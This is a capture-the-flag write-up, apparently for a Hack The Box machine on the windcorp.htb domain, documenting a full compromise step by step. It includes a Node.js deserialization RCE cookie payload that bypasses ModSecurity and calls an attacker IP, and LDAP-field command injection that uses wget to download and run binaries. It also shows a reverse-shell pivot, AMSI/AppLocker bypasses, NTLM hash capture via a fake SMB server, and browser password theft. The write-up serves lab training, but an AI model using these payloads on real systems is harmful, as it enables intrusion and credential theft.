Scanning

> TARGET=10.129.43.131 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON          VERSION
22/tcp open  ssh     syn-ack ttl 127 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    syn-ack ttl 127 nginx 1.18.0
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0

Web Enum

• Simple curl to check headers and basics

> curl -i http://10.129.43.131

• Found a domain www.windcorp.htb, add to /etc/hosts
• Subdomain enum

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://windcorp.htb/" -H "Host: FUZZ.windcorp.htb"

000000048:   403        43 L     162 W      2436 Ch     "portal"

• dirsearch

> dirsearch -u http://portal.windcorp.htb/

[16:36:23] 301 -  183B  - /3rdparty  ->  /3rdparty/                         
[16:36:28] 200 -  479B  - /About                                            
[16:36:28] 200 -  479B  - /about
[16:37:21] 301 -  173B  - /css  ->  /css/                                   
[16:37:41] 301 -  179B  - /images  ->  /images/                             
[16:37:51] 200 -    1KB - /login                                            
[16:37:52] 200 -    1KB - /login/admin/admin.asp                            
[16:37:52] 200 -    1KB - /login/admin/
[16:37:52] 200 -    1KB - /login/cpanel/
[16:37:52] 200 -    1KB - /login/cpanel.aspx
[16:37:52] 200 -    1KB - /login/
[16:37:52] 200 -    1KB - /login/administrator/
[16:37:52] 200 -    1KB - /login/cpanel.html
[16:37:52] 200 -    1KB - /login/cpanel.php
[16:37:52] 200 -    1KB - /login/cpanel.jsp
[16:37:52] 200 -    1KB - /login/cpanel.js
[16:37:52] 200 -    1KB - /login/super
[16:37:52] 200 -    1KB - /login/index
[16:37:52] 200 -    1KB - /login/login                                      
[16:37:52] 200 -    1KB - /login/oauth/                                     
[16:37:53] 302 -   23B  - /logout  ->  /                                    
[16:37:53] 302 -   23B  - /logout/  ->  /

• check for common credentials to http://portal.windcorp.htb, found valid credential admin:admin
• Continue dirsearch after login, found nothing useful.

> dirsearch -u http://portal.windcorp.htb/ --cookie="profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2NjI4NTIxNDUwMjJ9" -x 403

[19:25:45] 301 -  183B  - /3rdparty  ->  /3rdparty/
[19:25:50] 200 -  479B  - /About
[19:25:50] 200 -  479B  - /about
[19:26:47] 301 -  173B  - /css  ->  /css/
[19:27:09] 301 -  179B  - /images  ->  /images/

• When fuzzing after login, need to change the user agent

> ffuf -w /usr/share/wordlists/dirb/big.txt -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "Cookie: app=s%3A_BLNafoAK_5b8D901vyGdLFtnsyKI5hg.dY63I4%2BEefs9MO7vtDy0qisolrtlFJ27X%2BmDcN0OU4o; profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2NjI5MzgzNDI5NDZ9" -X GET -u http://portal.windcorp.htb/FUZZ -mc all -fr "Cannot find" -fs 1066 -c

3rdparty                [Status: 301, Size: 183, Words: 7, Lines: 11, Duration: 305ms]
About                   [Status: 200, Size: 479, Words: 23, Lines: 1, Duration: 488ms]
Login                   [Status: 200, Size: 1134, Words: 54, Lines: 1, Duration: 821ms]
about                   [Status: 200, Size: 479, Words: 23, Lines: 1, Duration: 450ms]
css                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 632ms]
images                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 378ms]
login                   [Status: 200, Size: 1134, Words: 54, Lines: 1, Duration: 417ms]
logout                  [Status: 302, Size: 23, Words: 4, Lines: 1, Duration: 896ms]
stylesheets             [Status: 301, Size: 189, Words: 7, Lines: 11, Duration: 400ms]

• craft a xss returns a waf block message

> http://portal.windcorp.htb/%3Cscript%3Eprompt(1)%3C/script%3E

You’ve been blocked for security reasons
If you believe this is a mistake, please contact the website owner
and include the request ID number from this page.
Request ID: c0da38c0c62d7efd Sat Sep 10 2022 20:13:55 GMT-0400 (Eastern Daylight Time)
This site is protected by ModSecurity

shell: webster

• Refer to the following articles on modsecurity cookie bypass: key=payload=value and nodejs rce
• https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
• https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/
• Achieved rce via modsecurity ruleset bypass and nodejs rce

> curl -i --cookie "app=$cookie_app;profile=$(echo '{"username":"_$$ND_FUNC$$_function(){require(\"child_process\").exec(\"curl http://<ip>\", function(error,stdout, stderr) { console.log(stdout) });}()"}'|base64 -w0)=<original_cookie>" 'http://portal.windcorp.htb/'

• Generate nodejs payload using nodejsshell.py

> python2 nodejsshell.py <ip> 4444

• Final payload should look like the following

> curl -i --cookie "app=$cookie_app;profile=$(echo '{"username":"_$$ND_FUNC$$_function(){eval(String.fromCharCode(10,......59,10))}()"}'|base64 -w0)=<original_cookie>" 'http://portal.windcorp.htb/'

cracking the zip

• Found a backup.zip file under /home/webster
• Download to local and crack using fcrackzip, but didn’t succeed

> fcrackzip -D -u -p '/usr/share/wordlists/rockyou.txt' backup.zip

• Since we can see some files included in the zip and some of the files are available on the target, bkcrack can be used
• https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#known-plaintext-zip-attack
• Upload bkcrack to the target

# create a zip of the passwd file
> cp /etc/passwd . && zip passwd.zip passwd

# crack and this produces a sequence of codes
> ./bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd
d6829d8d 8514ff97 afc3f825

# set a new pass to the encrypted file
> ./bkcrack -C backup.zip -U unlocked.zip meow -k d6829d8d 8514ff97 afc3f825

• Inspecting var/lib/sss/db/cache_windcorp.htb.ldb found the following account and hash

> strings var/lib/sss/db/cache_windcorp.htb.ldb

Ray.Duncan@WINDCORP.HTB
$6$nHb338EAa7BAeuR0$MFQjz2.B688LXEDsx035.Nj.CIDbe/u98V3mLrMhDHiAsh89BX9ByXoGzcXnPXQQF/hAj5ajIsm0zB.wg2zX81

• The hash can be cracked using john

> john hash.txt

pantera

user flag: ray.duncan to root

• login via ssh as ray.duncan

> ssh 'ray.duncan@windcorp.htb'@10.10.11.179

ray.duncan@windcorp.htb@webserver:/$ id
uid=1069003229(ray.duncan@windcorp.htb) gid=1069000513(domain users@windcorp.htb) groups=1069000513(domain users@windcorp.htb),1069003601(development@windcorp.htb)

• Using kinit for PE

ray.duncan@windcorp.htb@webserver:/$ kinit ray.duncan
Password for ray.duncan@WINDCORP.HTB: 

ray.duncan@windcorp.htb@webserver:/$ ksu 
Authenticated ray.duncan@WINDCORP.HTB
Account root: authorization for ray.duncan@WINDCORP.HTB successful
Changing uid to root (0)

root@webserver:/# id
uid=0(root) gid=0(root) groups=0(root)

• Previously, we found some firewall rules using linpeas that prevented us from pivoting the traffic, but now the traffic is open

[+] Iptables rules
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m multiport --dports 53,80,88,443 -m state --state NEW -j ACCEPT
-A OUTPUT -p udp -m multiport --dports 53,88,123 -m state --state NEW -j ACCEPT
-A OUTPUT -p icmp -m comment --comment "Allow Ping to work as expected" -j ACCEPT
-A OUTPUT -d 192.168.0.0/24 -m owner ! --uid-owner root -m state --state NEW -j DROP
COMMIT

root@webserver:~/.ssh# nc -vn 192.168.0.2 389
(UNKNOWN) [192.168.0.2] 389 (ldap) open

• Using dig, we locate the next target

hope.windcorp.htb.      3600    IN      A       192.168.0.2
hope.windcorp.htb.      3600    IN      A       10.10.11.179

• Scan 192.168.0.2 from the compromised container

> for p in {1..65535}; do nc -vn 192.168.0.2 $p -w 1 -z & done 2> output.txt

(UNKNOWN) [192.168.0.2] 22 (ssh) open
(UNKNOWN) [192.168.0.2] 53 (domain) open
(UNKNOWN) [192.168.0.2] 80 (http) open
(UNKNOWN) [192.168.0.2] 88 (kerberos) open
(UNKNOWN) [192.168.0.2] 389 (ldap) open
(UNKNOWN) [192.168.0.2] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.2] 464 (kpasswd) open
(UNKNOWN) [192.168.0.2] 3268 (?) open
(UNKNOWN) [192.168.0.2] 3269 (?) open
(UNKNOWN) [192.168.0.2] 5985 (?) open
(UNKNOWN) [192.168.0.2] 9389 (?) open
(UNKNOWN) [192.168.0.2] 49664 (?) open
(UNKNOWN) [192.168.0.2] 51648 (?) open
(UNKNOWN) [192.168.0.2] 58219 (?) open
(UNKNOWN) [192.168.0.2] 64610 (?) open

Setup pivot

• Upload chisel to the compromised container

# on kali
# update /etc/proxychains4.conf 
socks5 127.0.0.1 1080
> ./chisel server -p 9999 --reverse

# on target
> ./chisel client --max-retry-count=1 -v 10.10.14.9:9999 R:1080:socks

Access smb share

• From kali, request a silver ticket and connect to smb using krb

# request ticket
> proxychains getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/ray.duncan:pantera'
> export KRB5CCNAME=ray.duncan.ccache

# connect to smb
> proxychains smbclient.py ray.duncan@hope.windcorp.htb -k -no-pass

• Browse for contents

# use WC-Share
...
drw-rw-rw-          0  Fri Sep 16 04:26:58 2022 .
drw-rw-rw-          0  Mon May  2 06:33:07 2022 ..
-rw-rw-rw-         88  Fri Sep 16 04:26:58 2022 debug-users.txt

# cat debug-users.txt                                                  
IvanJennings43235345
MiriamMills93827637
BenjaminHernandez23232323
RayDuncan9342211

RCE on hope

• Refer to this for auth method explaination: https://gist.github.com/tscherf/a0be193fe7bd603bbe1f511f9a00e737
• On the compromised container, dump the ldap database for more information.

> ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'DC=windcorp,DC=htb' > ldapinfo.txt

• We can change the mobile number of ray.duncan, this field is vulnerable to cmd injection. Structure the payload in the form: mobile: ;<cmd>, following is an example of file upload.

# create a mod.ldif
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;wget http://10.10.14.173/file -O c:\wc-share\file;

# then send to modify the ldap record
> ldapmodify -Y GSSAPI -H ldap://windcorp.htb -D "CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb" -f mod.ldif

• Check the change and wait for a while (2 min period) to observe the request from hope. Note: there is a char limit on mobile field (i.e 64)

> ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb'

• The target is running applocker, we can craft a ldif to fetch the applocker policy

dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;Get-AppLockerPolicy -Effective -Xml > c:\wc-share\u

• Reading through the policy, we understand we need to look for a folder where we can write that is not on the exception list. Refer to this for some ideas: https://gist.github.com/mattifestation/5f9de750470c9e0e1f9c9c33f0ec3e56

<FilePathRule Id="2c47f772-4d79-4493-b64b-613e17f0011c" Name="All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow">
    <Conditions>
        <FilePathCondition Path="%WINDIR%\*" />
    </Conditions>
    <Exceptions>
        ...
    </Exceptions>

• Another thing we need is to bypass amsi, the following post helped a lot: https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/, We need to change the code to suit our purpose and compile it
• Following are steps i took to gain a reverse shell, don’t forget to use ldapmodify to apply the change for each step.

# upload the bypass code
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;wget http://10.10.14.9/B.exe -O C:\windows\debug\wia\B.exe

# run it
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;Start-Process -FilePath C:\windows\debug\wia\B.exe

• You should now land the DC as scriptrunner

PE: bob.wood

• Upload winpeas and collect info

> wget http://10.10.14.51/winPEASx64.exe -O c:\windows\debug\wia\winPEASx64.exe

LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)

• Note that ntlmv2 is enabled, can conduct ntlm leak attack using smbserver.
• Download smbserver binary from https://github.com/ropnop/impacket_static_binaries/releases, use the non-dev version.

# on webserver (the compromised container)
> ./smbserver MEOW . -smb2support

• Use the following ldif to trigger the DC to browse to our fake smbserver or you can simply run the command on the DC.

dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;cd \\webserver.windcorp.htb\MEOW\

• Wait for the call back

root@webserver:~# ./smbserver MEOW . -smb2support
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,64447)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*] User HOPE\scriptrunner authenticated successfully
[*] scriptrunner::WINDCORP:4141414141414141:f22b7ec10c6593b3649ddaea047a7981:0101000000000000006a486dbeced80134d6d338c45cc33d0000000001001000760057004c0055005500450041006f000200100074004600680073006d00460051004b0003001000760057004c0055005500450041006f000400100074004600680073006d00460051004b0007000800006a486dbeced80106000400020000000800300030000000000000000000000000210000fb5ff7cc504681bb86189765b31d067bf38927fe39b5605ade21dfebecb47dcf0a001000000000000000000000000000000000000900360063006900660073002f007700650062007300650072007600650072002e00770069006e00640063006f00720070002e006800740062000000000000000000
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (192.168.0.2,64447)
[*] Remaining connections []

• Crack the hash using hashcat, this is also the password for bob.wood

> hashcat -m 5600 hash.txt rockyou.txt

!@p%i&J#iNNo1T2

• Invoke command as bob.wood, and setup another nc listener to receive the reverse shell. B.exe is the reverse shell with amsi bypass that was previously uploaded.

$SecPassword = ConvertTo-SecureString '!@p%i&J#iNNo1T2' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('bob.wood', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\windows\debug\wia\B.exe }

PE: administrator

• Upload sharphound and collect data again, it seems that bob.wood is a member of IT, which has PSRemote right to the DC. However, we need to be a domain admin (e.g bob.woodadm) in order to fetch the admin pass. It is a logical thing to assume that bob.wood may use the same computer to login as bob.woodadm for administrative stuff. So, searching in the broswer cache may find useful info.
• bob.woodadm credential was saved in Edge, which can be found here: C:\users\bob.wood\appdata\local\microsoft\edge\user data\default\Login Data
• Use this tool to decrypt the password: https://github.com/moonD4rk/HackBrowserData

PS C:\windows\debug\wia> .\hbd.exe
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_password.csv success

PS C:\windows\debug\wia> cat results/microsoft_edge_default_password.csv
UserName,Password,LoginURL,CreateDate
bob.woodADM@windcorp.com,smeT-Worg-wer-m024,http://webmail.windcorp.com/login.html,2022-07-04T18:46:59.133335+02:00
bob.wood@windcorp.htb,SomeSecurePasswordIGuess!09,http://google.com/login.html,2022-07-04T18:14:00.217981+02:00
bob.wood@windcorp.htb,SemTro?32756Gff,http://somewhere.com/login.html,2022-07-04T18:12:42.849216+02:00

• Now, login as bob.woodadm and capture the root flag

$SecPassword = ConvertTo-SecureString 'smeT-Worg-wer-m024' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('bob.woodADM', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\windows\debug\wia\B.exe }